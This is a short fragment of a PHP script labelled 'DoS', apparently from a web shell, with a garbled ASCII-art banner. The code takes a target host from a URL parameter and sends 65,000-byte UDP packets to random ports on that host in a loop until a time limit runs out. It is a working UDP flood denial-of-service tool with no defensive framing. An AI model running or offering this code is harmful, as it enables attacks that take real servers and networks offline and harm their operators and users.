DoS
__ _ _ _ / ____| | | | | (___ | |__ ___| | | \___ \| '_ \ / _ \ | | __ _) | | | | __/ | | __/|_| |_|\___|_|_|"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "